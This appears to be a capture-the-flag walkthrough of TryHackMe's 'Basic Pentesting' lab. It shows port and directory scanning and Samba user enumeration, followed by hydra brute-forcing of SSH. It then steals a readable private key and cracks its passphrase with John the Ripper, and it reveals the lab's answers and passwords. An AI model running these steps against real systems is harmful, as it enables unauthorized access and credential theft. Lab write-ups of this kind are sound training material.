Basic Pentesting

Task 1. Web App Testing and Privilege Escalation

Question 1. 

Deploy the machine and connect to our network

Start the machine and connect to the  THM network using openvpn or the attack box.

Question 2.

Find the services exposed by the machine 

Nmap

# nmap -p- -A 10.10.204.61


Output

22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))

139/tcp  open  netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)

445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)

8080/tcp open  http        Apache Tomcat 9.0.7


Found 6 ports open.

Question 3. 

What is the name of the hidden directory on the web server(enter name without /)? 

For this we are going to use gobuster with the dirbuster directory-medium wordlist

Gobuster

# gobuster dir -u http://10.10.204.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Scan returned 2 directories 


Output

/development          (Status: 301) [Size: 316] [–> http://10.10.20.44/development/]

/server-status        (Status: 403) [Size: 299]   


Answer 3.

/development

Question 4. 

User brute-forcing to find the username & password

We could use hydra with username/password  lists to try and bruteforce passwords but since we have Samba ports exposed we will enumerate Samba shares, using a tool called enum4linux

Note

Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.

It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.

enum4linux

# enum4linux -U -a 10.10.204.61


Output

Share Enumeration on 10.10.204.61   

Anonymous       Disk      

IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)

[+] Enumerating users using SID S-1-22-1 and logon username ”, password ”

S-1-22-1-1000 Unix User\kay (Local User)

S-1-22-1-1001 Unix User\jan (Local User)


Found 2 usernames and 2 shares. 

Question 5. 

What is the username? 

Answer 5.

jan

Question 6.  

What is the password? 

OK since we have a username and port 22 (SSH) exposed we can  try bruteforcing the password using Hydra in combination with the rockyou wordlist.

Note

Hydra is a parallelized password cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. 

Hydra

# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.204.61 ssh                                                 


Output

[22][ssh] host: 10.10.204.61   login: jan   password: armando

1 of 1 target successfully completed, 1 valid password found


Success, Hydra found the password 

Answer 6. armando

Question 7.  What service do you use to access the server(answer in abbreviation in all caps)?

From our initial nmap scan we know that port 22 SSH is open so we will connect to the server using Secure Shell using username jan and password armando.

# ssh jan@10.10.204.61

enter the password and we are in. 

Answer 7.

SSH

Question 8.

Enumerate the machine to find any vectors for privilege escalation 

Now that we  have access to the server with jan’s account we can automate this process using linpeas script, the script can be found: 

Note

LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz 

So let’s get the script and copy it over to the server using jan’s credentials.

# git clone https://github.com/carlospolop/PEASS-ng.git

Navigate to the directory containing the linpeas.sh   (PEASS-ng/linPEAS/linpeas.sh)

# scp linpeas.sh jan@10.10.204.61:/tmp

Once the transfer is complete, run the script. This takes some time so be patient.

Script returned a lot of interesting files but most valuable of all are Kay’s private ssh keys. 

Question 9.

What is the name of the other user you found(all lower case)?

We got that from question 4 (enum4linux).

Answer 9.

Kay 

Question 10.

If you have found another user, what can you do with this information?

From the linpeas output we can see that Kay’s ssh private key is readable so we will exploit this to ssh-login with Kay and see if we can find the final password. 

The location of the private key is 

/home/kay/.ssh/

Question 11.  

What is the final password you obtain?

OK so, in order to login with Kay’s private key you need to provide a passphrase (which we don’t know) since his key is password protected. Let’s store the key in a file for now. 

$ cat /home/kay/.ssh/id_rsa

File containing the key on my local machine.

# nano /tmp/id_kay

Copy and paste the output  to a file in your local pc.

Since we already have the private key we can try to figure out the password for the key  using JohnTheRipper suite. 

Note

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. 

Ssh2john is part of John The Reaper suite. This is a script that basically transforms [RSA/DSA/EC/OPENSSH (SSH private keys) ] private key to john format for later cracking using JtR  

ssh2john

# /usr/share/john/ssh2john.py /tmp/id_kay > /tmp/s2j_kay

johntheripper

john /tmp/s2j_kay –wordlist =/usr/share/wordlist/rockyou.txt


Output

Will run 8 OpenMP threads

Note: This format may emit false positives, so it will keep trying even after

finding a possible candidate.

Press ‘q’ or Ctrl-C to abort, almost any other key for status

beeswax          (/tmp/kay_id)

Warning: Only 2 candidates left, minimum 8 needed for performance.

1g 0:00:00:04 DONE (2021-09-07 14:26) 0.2500g/s 3585Kp/s 3585Kc/s 3585KC/sa6_123..*7¡Vamos!

Session completed


Success, john found the password beeswax. Now using this passphrase we can unlock Kay’s private key and log in to the server as kay.

SSH

ssh kay@10.10.204.61

Enter passphrase.. and we are in. Now let’s have a look at this pass.bak file. 

$ cat pass.bak


Output

heresareallystrongpasswordthatfollowsthepasswordpolicy$$


Answer 11. 

heresareallystrongpasswordthatfollowsthepasswordpolicy$$